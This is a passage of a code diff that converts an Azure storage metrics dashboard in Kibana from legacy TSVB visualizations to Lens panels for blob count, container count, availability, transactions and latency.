"h": 9, "i": "0c873134-b025-487d-be81-f727dbff0174", "w": 5, - "x": 14, - "y": 0 + "x": 0, + "y": 5 }, "panelIndex": "0c873134-b025-487d-be81-f727dbff0174", + "title": "Storage Blob Capacity", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Blob Capacity [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color": null, - "background_color_rules": [ - { - "id": "71978870-32e4-11ea-af9e-d70582a45bda" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "d2cfe212-5327-4afa-b09d-4cea0f4abe67": { + "columnOrder": [ + "7772aa00-2719-4fb3-a52a-732158558669", + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0", + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1", + "2fd4f627-1d0e-40a7-a622-e57e790e5117" + ], + "columns": { + "2fd4f627-1d0e-40a7-a622-e57e790e5117": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.blob_count.avg))", + "isFormulaBroken": false + }, + "references": [ + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1" + ], + "scale": "ratio" + }, + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.blob_count.avg: *" + }, + "isBucketed": false, + "label": "Part of 
overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_count.avg" + }, + "2fd4f627-1d0e-40a7-a622-e57e790e5117X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_count.avg))", + "operationType": "overall_max", + "references": [ + "2fd4f627-1d0e-40a7-a622-e57e790e5117X0" + ], + "scale": "ratio" + }, + "7772aa00-2719-4fb3-a52a-732158558669": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Blob Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_count.avg" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-d2cfe212-5327-4afa-b09d-4cea0f4abe67", + "type": "index-pattern" } ], - "drilldown_url": "", - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda" - } - ], - "gauge_inner_color": null, - "gauge_inner_width": "6", - "gauge_style": "circle", - "gauge_width": "10", - "hide_last_value_indicator": true, - "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993", - "index_pattern": "metrics-*", - "interval": "60m", - "isModelInvalid": false, - "pivot_id": "azure.resource.name", - "pivot_label": "Resource Name", - "pivot_rows": "30", - "pivot_type": "string", - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(0,156,224,1)", - "fill": "1.2", - "filter": { - "language": "kuery", - 
"query": "" - }, - "formatter": "bytes", - "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993", - "label": "Blob Capacity", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.blob_capacity.avg", - "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": "azure.resource.name", - "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "timeseries", - "value_template": "{{value}}" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "gauge", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "visualization": { + "color": "#009CE0", + "layerId": "d2cfe212-5327-4afa-b09d-4cea0f4abe67", + "layerType": "data", + "maxAccessor": "2fd4f627-1d0e-40a7-a622-e57e790e5117", + "metricAccessor": "7772aa00-2719-4fb3-a52a-732158558669" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + "title": "Storage Blob Count", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 9, "i": "41faed50-ba96-4484-b6dc-71ed3e2d3427", "w": 5, - "x": 19, - "y": 0 + "x": 5, + "y": 5 }, "panelIndex": "41faed50-ba96-4484-b6dc-71ed3e2d3427", + "title": "Storage Blob Count", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Blob Count [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color": null, - "background_color_rules": [ - { - "id": "71978870-32e4-11ea-af9e-d70582a45bda" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, 
+ "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "b0d96c20-3261-4140-be71-84129244491f": { + "columnOrder": [ + "39df78b2-9658-4a1d-a2b4-7a84e6f13a45", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0" + ], + "columns": { + "39df78b2-9658-4a1d-a2b4-7a84e6f13a45": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Container Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.container_count.avg" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.container_count.avg))", + "isFormulaBroken": false + }, + "references": [ + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1" + ], + "scale": "ratio" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.container_count.avg: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.container_count.avg" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of 
overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "overall_max", + "references": [ + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-b0d96c20-3261-4140-be71-84129244491f", + "type": "index-pattern" } ], - "drilldown_url": "", - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda" + "visualization": { + "color": "#68BC00", + "layerId": "b0d96c20-3261-4140-be71-84129244491f", + "layerType": "data", + "maxAccessor": "cae2423e-1cef-4c5f-af30-c8c57fce42c0", + "metricAccessor": "39df78b2-9658-4a1d-a2b4-7a84e6f13a45" + } + }, + "title": "Storage Container Count", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", + "w": 5, + "x": 10, + "y": 5 + }, + "panelIndex": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", + "title": "Storage Container Count", + "type": "lens", + "version": "8.7.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "gauge_inner_color": null, - "gauge_inner_width": "6", - "gauge_style": "circle", - "gauge_width": "10", - "hide_last_value_indicator": true, - "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993", - "index_pattern": "metrics-*", - "interval": "60m", - "isModelInvalid": false, - "series": [ - 
{ - "axis_position": "right", - "chart_type": "line", - "color": "rgba(0,156,224,1)", - "fill": "1.2", - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "'0'", - "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993", - "label": "Blob Count", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.blob_count.avg", - "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "avg" + }, + "datasourceStates": { + "formBased": { + "layers": { + "094e2c52-4d02-4bf5-8971-1d17db5677da": { + "columnOrder": [ + "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4", + "da185728-bcee-4457-82d3-1520127e3664" + ], + "columns": { + "da185728-bcee-4457-82d3-1520127e3664": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, + "isBucketed": false, + "label": "Availability", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " %" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.availability.avg" + }, + "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": "azure.resource.name", - "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "timeseries", - "value_template": "{{value}}" + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ + { + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-094e2c52-4d02-4bf5-8971-1d17db5677da", + "type": "index-pattern" } ], - 
"show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "gauge", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.6, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "da185728-bcee-4457-82d3-1520127e3664" + ], + "layerId": "094e2c52-4d02-4bf5-8971-1d17db5677da", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "xAccessor": "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "da185728-bcee-4457-82d3-1520127e3664" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + "title": "Storage Availability", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 9, - "i": "1d623c03-4d02-4a81-b91e-49e82e112016", - "w": 19, - "x": 29, - "y": 0 + "i": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "w": 14, + "x": 15, + "y": 5 }, - "panelIndex": "1d623c03-4d02-4a81-b91e-49e82e112016", + "panelIndex": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "title": "Availability", + "type": 
"lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Transactions [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "filter": { - "language": "kuery", - "query": "" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } }, - "id": "c9fd65d0-32e8-11ea-84f4-e9593f8ba8f6", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "bar", - "color": "#3185FC", - "fill": 0.5, - "formatter": "number", - "id": "c9fd8ce0-32e8-11ea-84f4-e9593f8ba8f6", - "label": "avg(azure.storage_account.transactions.total)", - "line_width": "1", - "metrics": [ - { - "field": "azure.storage_account.transactions.total", - "id": "c9fd8ce1-32e8-11ea-84f4-e9593f8ba8f6", - "type": "max" + "datasourceStates": { + "formBased": { + "layers": { + "96b37a76-3db8-4552-ae26-45004aa4e892": { + "columnOrder": [ + "d4d768f9-effd-43f3-b30a-e6ad938d3483", + "6297e28c-ea13-4b49-af52-f1b78a6e3abc", + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + ], + "columns": { + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "avg(azure.storage_account.transactions.total)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.storage_account.transactions.total" + }, + "6297e28c-ea13-4b49-af52-f1b78a6e3abc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.response_type", + "operationType": 
"terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2092a1f3-dc5b-4462-9551-c6de4a2a7b78", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.response_type" + }, + "d4d768f9-effd-43f3-b30a-e6ad938d3483": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "rainbow", - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.response_type", - "terms_order_by": "c9fd8ce1-32e8-11ea-84f4-e9593f8ba8f6", - "type": "timeseries", - "value_template": "{{value}}" + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ + { + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-96b37a76-3db8-4552-ae26-45004aa4e892", + "type": "index-pattern" } ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + ], + "layerId": "96b37a76-3db8-4552-ae26-45004aa4e892", + "layerType": "data", + 
"palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar", + "splitAccessor": "6297e28c-ea13-4b49-af52-f1b78a6e3abc", + "xAccessor": "d4d768f9-effd-43f3-b30a-e6ad938d3483", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "Storage Transactions", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Transactions" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { - "h": 15, - "i": "ff6441f8-d66d-4399-bae5-25d3d861b299", - "w": 9, - "x": 0, + "h": 9, + "i": "1d623c03-4d02-4a81-b91e-49e82e112016", + "w": 19, + "x": 29, "y": 5 }, - "panelIndex": "ff6441f8-d66d-4399-bae5-25d3d861b299", + "panelIndex": "1d623c03-4d02-4a81-b91e-49e82e112016", + "title": "Transactions", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Filters [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "controls": [ - { - "fieldName": "azure.subscription_id", - "id": "1549397251041", - "indexPatternRefName": "control_0_index_pattern", - "label": "Subscription", - "options": { - "dynamicOptions": true, - "multiselect": false, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "azure.resource.group", - "id": 
"1549512142947", - "indexPatternRefName": "control_1_index_pattern", - "label": "Resource Group", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": true, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "779215db-6202-4568-89a9-46601c8c2fb4": { + "columnOrder": [ + "b03e8e6d-ed51-421f-8eb3-62191d2045ce", + "69665708-1c47-435e-b185-3ed5a8f59cfe", + "1d0a1f41-5061-414a-8e99-aa5d192a6525" + ], + "columns": { + "1d0a1f41-5061-414a-8e99-aa5d192a6525": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, + "isBucketed": false, + "label": "SuccessServerLatency (ms)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " ms" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.success_server_latency.avg" + }, + "69665708-1c47-435e-b185-3ed5a8f59cfe": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.api_name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1d0a1f41-5061-414a-8e99-aa5d192a6525", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.api_name" + }, 
+ "b03e8e6d-ed51-421f-8eb3-62191d2045ce": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "fieldName": "azure.resource.name", - "id": "1578578146383", - "indexPatternRefName": "control_2_index_pattern", - "label": "Resource Name", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-779215db-6202-4568-89a9-46601c8c2fb4", + "type": "index-pattern" } ], - "pinFilters": false, - "updateFiltersOnChange": true, - "useTimeFilter": false - }, - "type": "input_control_vis", - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1d0a1f41-5061-414a-8e99-aa5d192a6525" + ], + "layerId": "779215db-6202-4568-89a9-46601c8c2fb4", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar", + "splitAccessor": "69665708-1c47-435e-b185-3ed5a8f59cfe", + "xAccessor": "b03e8e6d-ed51-421f-8eb3-62191d2045ce", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "1d0a1f41-5061-414a-8e99-aa5d192a6525" + } + ] + } + ], + "legend": { + 
"isVisible": true,
+ "maxLines": 1,
+ "position": "right",
+ "shouldTruncate": true,
+ "showSingleSeries": true
+ },
+ "preferredSeriesType": "bar_stacked",
+ "tickLabelsVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "valueLabels": "hide",
+ "valuesInLegend": true,
+ "yLeftExtent": {
+ "mode": "full"
+ },
+ "yLeftScale": "linear",
+ "yRightExtent": {
+ "mode": "full"
+ },
+ "yRightScale": "linear"
 }
- }
- }
- }
- },
- {
- "version": "8.3.0",
- "type": "visualization",
+ },
+ "title": "Storage Success Server Latency",
+ "type": "lens",
+ "visualizationType": "lnsXY"
+ },
+ "enhancements": {},
+ "hidePanelTitles": false
+ },
 "gridData": {
 "h": 15,
 "i": "87066244-7840-4555-9d12-026d64977f1a",
- "w": 20,
- "x": 9,
- "y": 9
+ "w": 24,
+ "x": 0,
+ "y": 14
 },
 "panelIndex": "87066244-7840-4555-9d12-026d64977f1a",
+ "title": "Success Server Latency",
+ "type": "lens",
+ "version": "8.7.0"
+ },
+ {
 "embeddableConfig": {
- "enhancements": {},
- "savedVis": {
- "title": "Storage Success Server Latency [Azure Metrics]",
- "description": "",
- "uiState": {},
- "params": {
- "axis_formatter": "number",
- "axis_min": 0,
- "axis_position": "left",
- "axis_scale": "normal",
- "filter": {
- "language": "kuery",
- "query": ""
+ "attributes": {
+ "references": [],
+ "state": {
+ "adHocDataViews": {
+ "tsvb_ad_hoc_metrics-*/@timestamp": {
+ "allowNoIndex": true,
+ "fieldAttrs": {},
+ "fieldFormats": {},
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "metrics-*",
+ "runtimeFieldMap": {},
+ "sourceFilters": [],
+ "timeFieldName": "@timestamp",
+ "title": "metrics-*"
+ }
 },
- "id": "e9a40230-32e9-11ea-bda2-69435df36a5c",
- "index_pattern": "metrics-*",
- "interval": "5m",
- "isModelInvalid": false,
- "series": [
- {
- "axis_position": "right",
- "chart_type": "bar",
- "color": "#3185FC",
- "fill": 0.5,
- "formatter": "number",
- "id": "e9a40231-32e9-11ea-bda2-69435df36a5c",
- "label": "SuccessServerLatency (ms)",
- "line_width": "1",
- "metrics": [
- {
- "field": "azure.storage_account.success_server_latency.avg",
- "id": "e9a40232-32e9-11ea-bda2-69435df36a5c",
- "type": "avg"
+ "datasourceStates": {
+ "formBased": {
+ "layers": {
+ "75e28cd0-af63-4d76-bc48-27ab36ecee8f": {
+ "columnOrder": [
+ "e38795c4-e485-443d-a00f-5d1bf2ef7220",
+ "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff",
+ "9e9be992-df58-4b34-ad97-ba789b63accd"
+ ],
+ "columns": {
+ "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff": {
+ "dataType": "string",
+ "isBucketed": true,
+ "label": "Top 10 values of azure.dimensions.api_name",
+ "operationType": "terms",
+ "params": {
+ "exclude": [],
+ "excludeIsRegex": false,
+ "include": [],
+ "includeIsRegex": false,
+ "missingBucket": false,
+ "orderBy": {
+ "columnId": "9e9be992-df58-4b34-ad97-ba789b63accd",
+ "type": "column"
+ },
+ "orderDirection": "desc",
+ "otherBucket": false,
+ "parentFormat": {
+ "id": "terms"
+ },
+ "secondaryFields": [],
+ "size": 10
+ },
+ "scale": "ordinal",
+ "sourceField": "azure.dimensions.api_name"
+ },
+ "9e9be992-df58-4b34-ad97-ba789b63accd": {
+ "customLabel": true,
+ "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.success_e2elatency.avg: *"
+ },
+ "isBucketed": false,
+ "label": "Success E2E Latency (ms)",
+ "operationType": "last_value",
+ "params": {
+ "format": {
+ "id": "number",
+ "params": {
+ "decimals": 2,
+ "suffix": " ms"
+ }
+ },
+ "sortField": "@timestamp"
+ },
+ "scale": "ratio",
+ "sourceField": "azure.storage_account.success_e2elatency.avg"
+ },
+ "e38795c4-e485-443d-a00f-5d1bf2ef7220": {
+ "dataType": "date",
+ "isBucketed": true,
+ "label": "@timestamp",
+ "operationType": "date_histogram",
+ "params": {
+ "dropPartials": true,
+ "includeEmptyRows": true,
+ "interval": "auto"
+ },
+ "scale": "interval",
+ "sourceField": "@timestamp"
+ }
+ },
+ "incompleteColumns": {}
+ }
 }
- ],
- "point_size": 0,
- "separate_axis": 0,
- "split_color_mode": "rainbow",
- "split_mode": "terms",
- "stacked": "none",
- "terms_field": "azure.dimensions.api_name",
- "terms_order_by": "e9a40232-32e9-11ea-bda2-69435df36a5c",
- "type": "timeseries",
- "value_template": "{{value}} ms"
+ }
+ },
+ "textBased": {
+ "layers": {}
+ }
+ },
+ "filters": [],
+ "internalReferences": [
+ {
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "indexpattern-datasource-layer-75e28cd0-af63-4d76-bc48-27ab36ecee8f",
+ "type": "index-pattern"
 }
 ],
- "show_grid": 1,
- "show_legend": 1,
- "time_field": "@timestamp",
- "type": "timeseries",
- "use_kibana_indexes": false,
- "drop_last_bucket": 1
+ "query": {
+ "language": "kuery",
+ "query": ""
+ },
+ "visualization": {
+ "axisTitlesVisibilitySettings": {
+ "x": true,
+ "yLeft": false,
+ "yRight": true
+ },
+ "fillOpacity": 0.5,
+ "fittingFunction": "None",
+ "gridlinesVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "labelsOrientation": {
+ "x": 0,
+ "yLeft": 0,
+ "yRight": 0
+ },
+ "layers": [
+ {
+ "accessors": [
+ "9e9be992-df58-4b34-ad97-ba789b63accd"
+ ],
+ "layerId": "75e28cd0-af63-4d76-bc48-27ab36ecee8f",
+ "layerType": "data",
+ "palette": {
+ "name": "default",
+ "type": "palette"
+ },
+ "seriesType": "bar",
+ "splitAccessor": "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff",
+ "xAccessor": "e38795c4-e485-443d-a00f-5d1bf2ef7220",
+ "yConfig": [
+ {
+ "axisMode": "left",
+ "color": "#3185FC",
+ "forAccessor": "9e9be992-df58-4b34-ad97-ba789b63accd"
+ }
+ ]
+ }
+ ],
+ "legend": {
